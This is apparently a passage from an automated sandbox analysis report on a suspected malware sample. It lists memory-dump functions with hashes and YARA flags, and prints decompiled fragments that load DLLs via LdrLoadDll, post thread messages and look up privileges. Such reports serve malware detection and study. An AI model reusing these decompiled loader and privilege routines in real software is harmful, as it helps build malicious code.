                                                                                                    • Instruction Fuzzy Hash: E290026565100502D20171694404616100A97D0381F91C033A1024565ECA658992F171
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 5bd4fbc68472526f075799bf10b9317772f2bd1aa53cb32afeb16b9545a777c3
                                                                                                    • Instruction ID: b03c30204cc92be24be20190b9dbfcaeaba77f5a67c9e5d2e1fafd5958221270
                                                                                                    • Opcode Fuzzy Hash: 5bd4fbc68472526f075799bf10b9317772f2bd1aa53cb32afeb16b9545a777c3
                                                                                                    • Instruction Fuzzy Hash: 0990027525100413D21161694504707100997D0381F91C423A0424568D96968952F161
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 2b9f32c511be2f9a1942b644f478a92a7e428163993d92873a478d2f3efbe1ed
                                                                                                    • Instruction ID: 8ec9afdd4d60e5ed83b412ed8101fff854d4c980f7e25f1c4473eae9ae05e696
                                                                                                    • Opcode Fuzzy Hash: 2b9f32c511be2f9a1942b644f478a92a7e428163993d92873a478d2f3efbe1ed
                                                                                                    • Instruction Fuzzy Hash: A7900265292041525645B16944045075006A7E0381B91C023A1414960C85669856E661
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 6a0b55ff10dd2240b8be2fddbd63a50743d9c48c410caf59c7d2259e50a28fe2
                                                                                                    • Instruction ID: b652d5773aeeffbcf1ebe8822c241ff124206f7d5cdb63f31bcb80539b14df0e
                                                                                                    • Opcode Fuzzy Hash: 6a0b55ff10dd2240b8be2fddbd63a50743d9c48c410caf59c7d2259e50a28fe2
                                                                                                    • Instruction Fuzzy Hash: C49002A539100442D20061694414B061005D7E1341F51C026E1064564D8659CC52B166
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 57a712b834352b829ed1dc36c0f83cdcacea90b457814fefddea977ec74641b6
                                                                                                    • Instruction ID: 1dc34e4ed8ec24531d329aaacdf2451ea0c67c83a57086d3142912ddd227d33f
                                                                                                    • Opcode Fuzzy Hash: 57a712b834352b829ed1dc36c0f83cdcacea90b457814fefddea977ec74641b6
                                                                                                    • Instruction Fuzzy Hash: 429002A525200003420571694414616500A97E0341F51C032E10145A0DC5658891B165
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: a7c310abdd104c2e4761f2a54f7eb125b8cc91b30cdd165f7491559cbfc0a1cf
                                                                                                    • Instruction ID: 64cd28f814ba95d8a88a814c0cc1ea938c87f7dcf400e65f350c327baaa780df
                                                                                                    • Opcode Fuzzy Hash: a7c310abdd104c2e4761f2a54f7eb125b8cc91b30cdd165f7491559cbfc0a1cf
                                                                                                    • Instruction Fuzzy Hash: 4D9002B525100402D24071694404746100597D0341F51C022A5064564E86998DD5B6A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: dde6d0e089b8a94eeaf8b2713f714206cb1c98d4193302f06771c9fc75b61ec0
                                                                                                    • Instruction ID: 4da27a0785d6bc998ad137808472617d44b041785d7b3c45c52e42b8e100f8c2
                                                                                                    • Opcode Fuzzy Hash: dde6d0e089b8a94eeaf8b2713f714206cb1c98d4193302f06771c9fc75b61ec0
                                                                                                    • Instruction Fuzzy Hash: A7900269261000030205A5690704507104697D5391751C032F1015560CD6618861A161
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 3c0d8dc826c374a127620585521f69409d50dd0deb1a8e390a43262786bd557f
                                                                                                    • Instruction ID: 9b6e7c6d56abe2c6bf7ac78ac96acd86c6f1bc9ffcb6ed08383de1a3b7aa9b6e
                                                                                                    • Opcode Fuzzy Hash: 3c0d8dc826c374a127620585521f69409d50dd0deb1a8e390a43262786bd557f
                                                                                                    • Instruction Fuzzy Hash: 1F90027525108802D2106169840474A100597D0341F55C422A4424668D86D58891B161
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 862ba9fc128ecdfa807e60d8b92b8a3268757c92aac29754748a660def59a7e0
                                                                                                    • Instruction ID: 2d878a4abe6c2abe378ccade2bd99b25ec38516a10a08321ee955ac5846c2c77
                                                                                                    • Opcode Fuzzy Hash: 862ba9fc128ecdfa807e60d8b92b8a3268757c92aac29754748a660def59a7e0
                                                                                                    • Instruction Fuzzy Hash: A4900265651000424240717988449065005BBE1351B51C132A0998560D85998865A6A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 87c6514985171da0666242b9b9c25290592c4c4f4546e1ad5deb6aad311d92c7
                                                                                                    • Instruction ID: c11dc4f8bf4cc83ca56aed057db7074838c7653921fbadda8873a6d40c0e4df8
                                                                                                    • Opcode Fuzzy Hash: 87c6514985171da0666242b9b9c25290592c4c4f4546e1ad5deb6aad311d92c7
                                                                                                    • Instruction Fuzzy Hash: CB90027525140402D2006169481470B100597D0342F51C022A1164565D86658851B5B1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: f50c3b33332f2b22d9c74bf978f8bcd676c9084d92f7b9a7bbc5e6a33a139132
                                                                                                    • Instruction ID: e1b58dad502d362dc74a73ca19ca1444325efb9f213a2d7892fe76630b1cdf33
                                                                                                    • Opcode Fuzzy Hash: f50c3b33332f2b22d9c74bf978f8bcd676c9084d92f7b9a7bbc5e6a33a139132
                                                                                                    • Instruction Fuzzy Hash: D890027525100802D2807169440464A100597D1341F91C026A0025664DCA558A59B7E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: c020d1a2287affc1ed48a0c2e2398d71dd3f2eff2b918c1e952539264cac836d
                                                                                                    • Instruction ID: ab9092f65f88e7c0655183512ae3de668fd2dc8a75314ffb857419d647d6e073
                                                                                                    • Opcode Fuzzy Hash: c020d1a2287affc1ed48a0c2e2398d71dd3f2eff2b918c1e952539264cac836d
                                                                                                    • Instruction Fuzzy Hash: 4F90026526180042D30065794C14B07100597D0343F51C126A0154564CC9558861A561
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 6a2331e3f64ea5228ccc5d773338879145014eebcd8cd3711ab7c3e4c5fcfa66
                                                                                                    • Instruction ID: c20d8af22470d35876ffae0bb46b2a043ceb7ff2ecee740579b106ec460da8c1
                                                                                                    • Opcode Fuzzy Hash: 6a2331e3f64ea5228ccc5d773338879145014eebcd8cd3711ab7c3e4c5fcfa66
                                                                                                    • Instruction Fuzzy Hash: 6D90026535100003D240716954186065005E7E1341F51D022E0414564CD9558856A262
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: f49d90c80c0d3f64987243a2b5bd0a96caad7da04e894ed9ddd0ef0fafb2d13b
                                                                                                    • Instruction ID: 8f43aad336343eaed1803fc4d860d2a2ec7d09a8f81e38ca8516e095730eb273
                                                                                                    • Opcode Fuzzy Hash: f49d90c80c0d3f64987243a2b5bd0a96caad7da04e894ed9ddd0ef0fafb2d13b
                                                                                                    • Instruction Fuzzy Hash: 7290026D26300002D2807169540860A100597D1342F91D426A0015568CC9558869A361
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 3efcc90026bc24b561379373d774f1ed6dc95ad63f2fe44e51267bb5a8d34995
                                                                                                    • Instruction ID: 652eab03134a7dd0623b0ab2ba14896870c0694fbc931df029c569de53aebfc3
                                                                                                    • Opcode Fuzzy Hash: 3efcc90026bc24b561379373d774f1ed6dc95ad63f2fe44e51267bb5a8d34995
                                                                                                    • Instruction Fuzzy Hash: BE90027536114402D21061698404706100597D1341F51C422A0824568D86D58891B162
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: a6fbb64cca22bfbfaad8526de863e61ce368abfc0464ddbbc5b1472c575de09e
                                                                                                    • Instruction ID: f2211809831cf843a871e4edd5630934374d4518c023bb16ae82aa7d253b88d6
                                                                                                    • Opcode Fuzzy Hash: a6fbb64cca22bfbfaad8526de863e61ce368abfc0464ddbbc5b1472c575de09e
                                                                                                    • Instruction Fuzzy Hash: 2290027525100402D20065A95408646100597E0341F51D022A5024565EC6A58891B171
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00437260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 82%
                                                                                                    			E00437260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00449D20( &_v67, 0, 0x3f);
				E0044A900( &_v68, 3);
				_t12 = E00439B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00443E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00439280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                    0x00437260
                                                                                                    0x0043726f
                                                                                                    0x00437273
                                                                                                    0x0043727e
                                                                                                    0x0043728e
                                                                                                    0x0043729e
                                                                                                    0x004372a3
                                                                                                    0x004372aa
                                                                                                    0x004372ad
                                                                                                    0x004372ba
                                                                                                    0x004372bc
                                                                                                    0x004372be
                                                                                                    0x004372db
                                                                                                    0x004372db
                                                                                                    0x00000000
                                                                                                    0x004372dd
                                                                                                    0x004372e2

                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004372BA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1836367815-0
                                                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                    • Instruction ID: aa5455c17ca0cb14443773f8e1935ede802d25dc85e1cd536545a6d5fe1fabfd
                                                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                    • Instruction Fuzzy Hash: E201F771A8022876F720A6958C03FFFB72C9B04B54F14405AFF04BA1C1E6D86D0683F9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00439B13, Relevance: 1.6, APIs: 1, Instructions: 51libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 73%
                                                                                                    			E00439B13(void* __eflags, intOrPtr _a4, void* _a8) {
				intOrPtr _v4;
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v16;
				char _v540;
				struct _OBJDIR_INFORMATION _t16;
				void* _t23;
				void* _t35;
				void* _t36;

				_t15 = 0xc2;
				asm("cli");
				if(__eflags > 0) {
					L5:
					_t36 = _t35 + 4;
					__eflags = _t15;
					if(_t15 != 0) {
						E0044B1F0( &_v8, 0);
						_t36 = _t36 + 8;
					}
					_t16 = E00449300(_v4);
					_v12 = _t16;
					__eflags = _t16;
					if(_t16 == 0) {
						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
						_t16 = _v12;
					}
					return _t16;
				} else {
					asm("sbb [edi], ah");
					asm("cmpsd");
					asm("aam 0x32");
					_push(0xec8b55a9);
					_push(0xc2);
					_v12 =  &_v540;
					_t23 = E0044AB50( &_v16, 0x104, _a4);
					_t35 = _t35 - 0x214 + 0xc;
					if(_t23 != 0) {
						_t15 = E0044AF70(__eflags, _v8);
						goto L5;
					} else {
						return _t23;
					}
				}
			}












                                                                                                    0x00439b13
                                                                                                    0x00439b15
                                                                                                    0x00439b16
                                                                                                    0x00439b58
                                                                                                    0x00439b58
                                                                                                    0x00439b5b
                                                                                                    0x00439b5d
                                                                                                    0x00439b65
                                                                                                    0x00439b6a
                                                                                                    0x00439b6a
                                                                                                    0x00439b71
                                                                                                    0x00439b79
                                                                                                    0x00439b7c
                                                                                                    0x00439b7e
                                                                                                    0x00439b92
                                                                                                    0x00439b94
                                                                                                    0x00439b94
                                                                                                    0x00439b9a
                                                                                                    0x00439b18
                                                                                                    0x00439b18
                                                                                                    0x00439b1a
                                                                                                    0x00439b1b
                                                                                                    0x00439b1e
                                                                                                    0x00439b20
                                                                                                    0x00439b3c
                                                                                                    0x00439b3f
                                                                                                    0x00439b44
                                                                                                    0x00439b49
                                                                                                    0x00439b53
                                                                                                    0x00000000
                                                                                                    0x00439b4b
                                                                                                    0x00439b4e
                                                                                                    0x00439b4e
                                                                                                    0x00439b49

                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00439B92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: f6c4614143237f7e116fd72d2d18412036214e4573f660f8309867521c324285
                                                                                                    • Instruction ID: 6d4ecc7708140e40533ce607aa3404ede347af7a7a401275f3398f9da7966a10
                                                                                                    • Opcode Fuzzy Hash: f6c4614143237f7e116fd72d2d18412036214e4573f660f8309867521c324285
                                                                                                    • Instruction Fuzzy Hash: 280175B5E4020DABEF10DEA5ED42FDEB774AB44308F00419AE90897241F675EB58CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00439B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00439B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0044AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0044AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0044B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00449300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                    0x00439b3c
                                                                                                    0x00439b3f
                                                                                                    0x00439b44
                                                                                                    0x00439b49
                                                                                                    0x00439b53
                                                                                                    0x00439b58
                                                                                                    0x00439b5b
                                                                                                    0x00439b5d
                                                                                                    0x00439b65
                                                                                                    0x00439b6a
                                                                                                    0x00439b6a
                                                                                                    0x00439b71
                                                                                                    0x00439b79
                                                                                                    0x00439b7c
                                                                                                    0x00439b7e
                                                                                                    0x00439b92
                                                                                                    0x00000000
                                                                                                    0x00439b94
                                                                                                    0x00439b9a
                                                                                                    0x00439b4e
                                                                                                    0x00439b4e
                                                                                                    0x00439b4e

                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00439B92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                    • Instruction ID: ce75731ab9865f50fe44abcf86b97f35b85da1ad60b8391fd0ffb4dacc1c2d0f
                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                    • Instruction Fuzzy Hash: 6E0112B5D4010DBBEF10DBE5EC42F9EB778AB54308F004199A90897241F675FB14C795
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00448622, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E00448622(void* __eax, signed int __ebx, signed int __ecx, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t17;

				asm("fidiv word [ebp+0x6a]");
				 *(__edi + 5) =  *(__edi + 5) >> __ecx;
				 *(__eax - 0x6e) =  *(__eax - 0x6e) ^ __ebx;
				asm("rcl byte [ebp-0x75], 0xec");
				_t14 = _a4;
				E00448DC0(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t14 + 0xa18)), 0, 0x46);
				_t17 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t17;
			}




                                                                                                    0x00448626
                                                                                                    0x00448629
                                                                                                    0x0044862c
                                                                                                    0x0044862f
                                                                                                    0x00448633
                                                                                                    0x0044864a
                                                                                                    0x00448660
                                                                                                    0x00448664

                                                                                                    APIs
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0043CFA2,0043CFA2,00000041,00000000,?,00438B65), ref: 00448660
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3899507212-0
                                                                                                    • Opcode ID: 2f2b8b87832c83d0bd8db6a16b0aaf8dd92d76736b25258417f275e31255b01a
                                                                                                    • Instruction ID: dc2da879e18c31c8dad7fa3d332a29d73119b5d4d019438ccfce94c217ebe9c1
                                                                                                    • Opcode Fuzzy Hash: 2f2b8b87832c83d0bd8db6a16b0aaf8dd92d76736b25258417f275e31255b01a
                                                                                                    • Instruction Fuzzy Hash: EEF0A0B16013486BDB20DF68CC45EDF7BA8AF85250F018658FD485B292CA30A811CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

